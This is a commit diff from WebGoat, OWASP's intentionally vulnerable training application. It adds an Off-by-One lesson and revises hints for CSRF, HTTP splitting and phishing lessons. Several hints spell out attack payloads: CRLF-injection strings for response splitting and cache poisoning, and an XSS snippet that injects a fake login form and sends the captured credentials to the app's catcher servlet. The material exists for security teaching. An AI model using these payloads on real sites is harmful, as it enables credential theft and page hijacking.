dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added Buffer Overflow lesson, added and updated solutions, fixed errors in lessons preventing them from being completed correctly

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@436 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
x71c4l@gmail.com
2011-08-12 03:00:27 +00:00
parent be8b4311e0
commit 4059bb5d33
110 changed files with 2590 additions and 1116 deletions
Download Patch File Download Diff File Expand all files Collapse all files

103
src/main/java/org/owasp/webgoat/lessons/BufferOverflow.java
View File

@ -1,103 +0,0 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.StringElement;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class BufferOverflow extends LessonAdapter
{
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
// just to get the generic how to text.
return super.createContent(s);
}
/**
* Gets the category attribute of the ForgotPassword object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* Gets the hints attribute of the HelloScreen object
*
* @return The hints value
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Lesson Hint 1");
hints.add("Lesson Hint 2");
return hints;
}
private final static Integer DEFAULT_RANKING = new Integer(15);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HelloScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Buffer Overflow");
}
public Element getCredits()
{
return new StringElement("This screen created by: Your name could go here");
}
}

6
src/main/java/org/owasp/webgoat/lessons/CSRF.java
View File

@ -92,7 +92,7 @@ public class CSRF extends LessonAdapter
String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
String message = s.getParser().getRawParameter(MESSAGE, "");
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "INSERT INTO messages VALUES (?, ?, ?, ?, ? )";
@ -221,7 +221,7 @@ public class CSRF extends LessonAdapter
try
{
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
// edit by Chuck Willis - Added logic to associate similar usernames
// The idea is that users chuck-1, chuck-2, etc will see each other's messages
@ -280,7 +280,7 @@ public class CSRF extends LessonAdapter
{
int messageNum = s.getParser().getIntParameter(NUMBER, 0);
Connection connection = DatabaseUtilities.getConnection(s);
Connection connection = DatabaseUtilities.getConnection(getNameroot(s.getUserName()),s.getWebgoatContext());
String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ? and lesson_type = ?";
PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,

8
src/main/java/org/owasp/webgoat/lessons/Category.java
View File

@ -57,11 +57,11 @@ public class Category implements Comparable
public final static Category XSS = new Category("Cross-Site Scripting (XSS)", new Integer(900));
public final static Category DOS = new Category("Denial of Service", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1000));
public final static Category ERROR_HANDLING = new Category("Improper Error Handling", new Integer(1100));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200));
public final static Category INJECTION = new Category("Injection Flaws", new Integer(1100));
public final static Category DOS = new Category("Denial of Service", new Integer(1200));
public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300));

4
src/main/java/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java
View File

@ -338,7 +338,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 1: Look in the last row of the hidden table.");
hints
.add("Stage 1: You can access the server directly <a href = \"/WebGoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
.add("Stage 1: You can access the server directly <a href = \"/webgoat/lessons/Ajax/clientSideFiltering.jsp?userId=102\">here </a>"
+ "to see what results are being returned");
hints.add("Stage 2: The server uses an XPath query agasinst an XML database.");
@ -346,7 +346,7 @@ public class ClientSideFiltering extends SequentialLessonAdapter
hints.add("Stage 2: The query currently returns all of the contents of the database.");
hints
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, who's userID is 102");
.add("Stage 2: The query should only return the information of employees who are managed by Moe Stooge, whose userID is 102");
hints.add("Stage 2: Try using a filter operator.");

4
src/main/java/org/owasp/webgoat/lessons/DOMInjection.java
View File

@ -74,7 +74,7 @@ public class DOMInjection extends LessonAdapter
s.getResponse().setHeader("Cache-Control", "no-cache");
PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
out.print("document.forms[0].SUBMIT.disabled = false;");
out.print("document.form.SUBMIT.disabled = false;");
out.flush();
out.close();
return;
@ -182,7 +182,7 @@ public class DOMInjection extends LessonAdapter
List<String> hints = new ArrayList<String>();
hints.add("This page is using XMLHTTP to comunicate with the server.");
hints.add("Try to find a way to inject the DOM to enable the Activate button.");
hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
hints.add("Intercept the reply and replace the body with document.form.SUBMIT.disabled = false;");
return hints;
}

2
src/main/java/org/owasp/webgoat/lessons/DOMXSS.java
View File

@ -243,7 +243,7 @@ public class DOMXSS extends SequentialLessonAdapter
if (getLessonTracker(s).getStage() == 1)
{
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/webgoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
}
else if (getLessonTracker(s).getStage() == 2)
{

4
src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
View File

@ -228,11 +228,11 @@ public class HttpSplitting extends SequentialLessonAdapter
hints.add("The Content-Length: 0 will tell the server that the first request is over.");
hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E <br/>For insight into what this does, use the PHP charset encoder to decode it.");
hints
.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
hints
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
hints
.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
hints

2
src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
View File

@ -361,7 +361,7 @@ public class MaliciousFileExecution extends LessonAdapter
String instructions = "The form below allows you to upload an image which will be displayed on this page. "
+ "Features like this are often found on web based discussion boards and social networking sites. "
+ "This feature is vulnerable to Malicious File Execution."
+ "<br><br>In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute,"
+ "<br><br>In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute,"
+ " it should create another file named:<br><br> "
+ uploads_and_target_parent_directory
+ TARGET_RELATIVE_PATH

518
src/main/java/org/owasp/webgoat/lessons/OffByOne.java Normal file
View File

@ -0,0 +1,518 @@
package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.IMG;
import org.apache.ecs.html.Input;
import org.apache.ecs.html.TD;
import org.apache.ecs.html.TR;
import org.apache.ecs.html.Table;
import org.apache.ecs.xhtml.br;
import org.owasp.webgoat.session.ECSFactory;
import org.owasp.webgoat.session.ParameterNotFoundException;
import org.owasp.webgoat.session.ValidationException;
import org.owasp.webgoat.session.WebSession;
/***************************************************************************************************
*
*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
* please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2007 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at code.google.com, a repository for free software
* projects.
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Yiannis Pavlosoglou <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created December 05, 2009
*/
public class OffByOne extends LessonAdapter
{
private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"};
private final static String ROOM_NUMBER = "room_no";
private final static String FIRST_NAME = "first_name";
private final static String LAST_NAME = "last_name";
private final static String PRICE_PLAN = "price_plan";
private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd")
.setBorder(0).setHspace(0).setVspace(0);
/**
* <p>The main method for creating content, implemented
* from the the LessonAdapter class.</p>
*
* <p>This particular "Off-by-One" lesson belonging in
* the category of "Buffer Overflows" carries three
* steps.</p>
*
* @param s
* WebSession
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
if(isFirstStep(s))
{
ec.addElement(makeFirstStep(s));
}
else
{
if (isSecondStep(s))
{
ec.addElement(makeSecondStep(s));
}
else
{
ec.addElement(makeThirdStep(s));
}
}
} catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
}
return (ec);
}
/**
* <p>Returns the Buffer Overflow category for this
* lesson.</p>
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.BUFFER_OVERFLOW;
}
/**
* <p>Returns the hints as a List of Strings
* for this lesson.</p>
*
* @return The hints values
*/
public List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
hints.add("See which fields during the registration process, allow for really long input to be submitted.");
hints.add("Check for hidden form fields during registration");
hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
return hints;
}
/**
* <p>Get the default ranking within the "Buffer
* Overflow" category.</p>
*
* <p>Currently ranked to be the first lesson in
* this category.</p>
*
* @return The value of 5 as an Integer Object
*/
protected Integer getDefaultRanking()
{
return new Integer(5);
}
/**
* <p>Gets the title attribute for this lesson.</p>
*
* @return "Off-by-One Overflows"
*/
public String getTitle()
{
return ("Off-by-One Overflows");
}
/**
* yada, yada...
*/
public Element getCredits()
{
return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO);
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the first step of this lesson.</p>
*
* @param s
* @return true if we are in the first step of the lesson.
*/
protected boolean isFirstStep(WebSession s)
{
String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
String name = s.getParser().getRawParameter(FIRST_NAME, "");
String last = s.getParser().getRawParameter(LAST_NAME, "");
return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
}
/**
* <p>Based on the parameters currently with values, this method
* returns true if we are in the second step of this lesson.</p>
*
* @param s
* @return true if we are in the second step of the lesson
*/
protected boolean isSecondStep(WebSession s)
{
String price = s.getParser().getRawParameter(PRICE_PLAN, "");
return price.isEmpty();
}
/**
* <p>Method for constructing the first step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the first step.
*/
private Element makeFirstStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 1/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Name
try {
param = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
Input input = new Input(Input.TEXT, FIRST_NAME, param);
TR tr = new TR();
tr.addElement(new TD().addElement("First Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Last Name
try {
param = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, LAST_NAME, param);
tr = new TR();
tr.addElement(new TD().addElement("Last Name: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Room Number
try {
param = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
} catch (ParameterNotFoundException e) {
param = "";
} catch (ValidationException e) {
param = "";
}
input = new Input(Input.TEXT, ROOM_NUMBER, param);
tr = new TR();
tr.addElement(new TD().addElement("Room Number: "));
tr.addElement(new TD().addElement(input));
tr.addElement(new TD().addElement("*"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("* The above fields are required for login."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the second step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the second step.
*/
private Element makeSecondStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("Please select from the following available price plans:"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Step 2/2"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("Available Price Plans:"));
tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, LAST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, FIRST_NAME, param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
ec.addElement(input);
ec.addElement("\r\n");
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
/**
* <p>Method for constructing the third step and returning it as
* an Element.</p>
*
* @param s
* @return The Element that is the third step.
*/
private Element makeThirdStep(WebSession s)
{
ElementContainer ec = new ElementContainer();
String param = "";
// Header
ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Process complete"));
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
ec.addElement(new br());
ec.addElement(new br());
// Table
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
// First Empty Row
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Price Plans
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
// Submit
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
tr.addElement(new TD().addElement("&nbsp;"));
t.addElement(tr);
ec.addElement(t);
ec.addElement("\r\n");
// Hidden Form Fields
param = s.getParser().getStringParameter(LAST_NAME, "");
Input input = new Input(Input.HIDDEN, "a", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(FIRST_NAME, "");
input = new Input(Input.HIDDEN, "b", param);
ec.addElement(input);
ec.addElement("\r\n");
param = s.getParser().getStringParameter(ROOM_NUMBER, "");
input = new Input(Input.HIDDEN, "c", param);
ec.addElement(input);
ec.addElement("\r\n");
// And finally the check...
if(param.length() > 4096)
{
ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "e", "Ravern"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "f", "4321"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "g", "John"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "h", "Smith"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "i", "56"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "j", "Ana"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "k", "Arneta"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "l", "78"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "m", "Lewis"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
ec.addElement("\r\n");
ec.addElement(new Input(Input.hidden, "o", "9901"));
ec.addElement("\r\n");
// :)
makeSuccess(s);
}
// Footer
ec.addElement(new br());
ec.addElement(new br());
ec.addElement(new StringElement("We would like to thank you for your payment."));
ec.addElement(new br());
ec.addElement(new br());
return ec;
}
}

59
src/main/java/org/owasp/webgoat/lessons/Phishing.java
View File

@ -170,21 +170,21 @@ public class Phishing extends LessonAdapter
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
@ -192,49 +192,52 @@ public class Phishing extends LessonAdapter
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>doucument.phish.user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+ "<BR><BR>The entire javascript portion:<BR><BR>"
+ "&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; + document.forms[0].pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
* were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
* document.forms[0].pass.value); XSSImage=new Image;
* were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
* document.phish.pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
* +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
* "";}</script><form><br>
* +document.phish.user.value + "&password=" + document.phish.pass.value +
* "";}</script><form name="phish"><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2> <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* <input type="text" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
@ -258,7 +261,7 @@ public class Phishing extends LessonAdapter
